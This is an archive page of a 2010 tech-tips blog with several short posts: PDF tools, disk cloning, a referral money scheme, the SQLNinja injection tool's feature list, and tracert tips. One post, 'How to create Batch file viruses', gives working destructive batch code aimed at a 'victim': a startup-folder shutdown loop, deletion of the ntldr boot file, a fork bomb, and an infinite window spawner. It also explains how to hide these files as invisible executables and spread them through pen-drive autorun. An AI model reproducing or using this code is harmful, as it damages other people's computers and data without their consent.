Friday, December 31, 2010

Watermark, Split, Join or Convert PDF Files with PDFaid

Posted by Abhinav Duggal 7:01 AM, under ,, | No comments

One of the important features of PDF files is that it is not easy to edit the PDF files, in fact it is mostly used because of this feature only which serves as its advantage. But there are occasions when we need to watermark the PDF file, convert to some other format or split and joininto smaller parts.
With the help of an online utility called PDFaid we can perform many things on our files like we can split a PDF file into many files, join the PDF files in one, watermark our PDF files with some text of our choice or convert a doc into the PDF format. In short, it is a simple and single tool for most of your PDF requirements.
What you all need is just open the below mentioned website, select your operation to be performed, browse for your PDF file and perform the remaining actions. Like to watermark your file, browse your file, select the text and color options and click the Watermark PDF button. You can then download the converted/operated file from the link afterwards.
Although the tool is not completely free but you can use the utility with some size restrictions on the site.

Wednesday, December 29, 2010

Create Self Bootable Clone of Disks

Posted by Abhinav Duggal 9:53 AM, under ,, | No comments


If you are looking for creating a ghost image for your disk or cloning your drive then here is some that you might need. There are many disk cloning tools available like Norton Ghostor the DriveImage but this is a tool called XXClone which is bit simpler than the two and also available free.




Features of XXClone:


• Makes a self-bootable clone of Windows system disk.


• Supports all 32-bit Windows (95, 98, ME, NT4, 2000, XP).


• Can restore the self-bootability in many cases.


• Supports common internal disk drives (IDE, SATA, SCSI).


• Supports external USB/FIREWIRE drives (good for a laptop).


• Competes with Norton Ghost, DriveImage, MaxBlast.


• Much faster than any of them in typical daily backup.


• Need not go to the DOS mode.   Operates in regular Windows environment.


• Simpler in use.


So if in case you are struggling with the Norton Ghost or other drive ghost tools then you should give this tool a try.

Make Money Online Read Emails And Refer Friends

Posted by Abhinav Duggal 9:48 AM, under , | No comments

Only For Indians

Rs. 99 instantly just for joining Paisalive.in

Upto Rs. 50 for each friend you refer to Paisalive.in

Upto Rs. 5 for each Paisalive email that you check

Rs. 5 for verifying your mobile number.

Upto Rs. 1 everyday when you login to your PaisaPay account daily

Minimum Payout Rs 500/-

Payment Method : Cheque

Join Now

How to create Batch file viruses?

Posted by Abhinav Duggal 6:33 AM, under ,, | No comments


What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example.

Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x'.
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.


Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.


:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.




2. copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.






Lets make a batch file to delete this file from victim's computer and the windows will not start then. to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again.



4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.


The viruses we just coded -:







Note : Most of the batch viruses are simply undetectable by any anitiviruses

Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.






You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.

Open notepad and write




[autorun]
open=anything.bat
Icon=anything.ico



Save file as ‘autorun.inf

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Tuesday, December 28, 2010

SQLNinja 0.2.5 Exploit SQL Injection Vulnerabilities

Posted by Abhinav Duggal 12:21 AM, under , | No comments





Introduction


============


Sqlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide an interactive access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered. It is written in Perl, it is released under the GPLv2 and so far has been successfully tested on:





- Linux


- FreeBSD


- Mac OS X





You can find it, together with a flash demo of its features, at the addresshttp://sqlninja.sourceforge.net





What's new


==========


# Proxy support (it was about time!)


# No more 64k bytes limit in upload mode


# Upload mode is also massively faster


# Privilege escalation through token kidnapping (kudos to Cesar Cerrudo)


# Other minor improvements





What's not so new


=================


# Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)


# Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)


# Privilege escalation to sysadmin group if 'sa' password has been found


# Creation of a custom xp_cmdshell if the original one has been removed


# Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)


# TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell


# Direct and reverse bindshell, both TCP and UDP


# DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)


# Evasion techniques to confuse a few IDS/IPS/WAF


# Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection

A Temprary Microphone

Posted by Abhinav Duggal 12:00 AM, under , | No comments

Do you know ?

There is an interesting fact about Headphones i.e. they can also be used as a microphone !
Technically :
There is not much difference between the circuits of a Microphone and a Headphone , just the headphone is designed to spread voice and an microphone to capture the voice !

Working : 
So if you connect the headphone in the microphone slot of your computer, you could use it as a microphone.
Just speak in the ear buds of the microphone, but please speak a bit loudly to be audible at the other end !

** Remember it is just a temporary solution !

Monday, December 27, 2010

Trace Websites

Posted by Abhinav duggal 11:29 AM, under , | No comments


My Exclusive... another contribution to Computer Tricks !

Surfing Internet...
Type in the url and Hit Enter, that's it ?

But...Have you ever thought what happens after that ?

Lets Trace n see what happens !

Do the following :
Start >> Run
# Type 
cmd
# This will open the Command Prompt
# Type 
cd\
# Type 
tracert www.google.com
---------------------- Note ---------------------------
You can replace www.google.com with any website url.
---------------------------------------------------------

Results :
$ First line shows the 
IP address of the website...$ You'll be shown steps in which the website gets load !
$ More is the number of steps more is time taken to load the website !
That's all !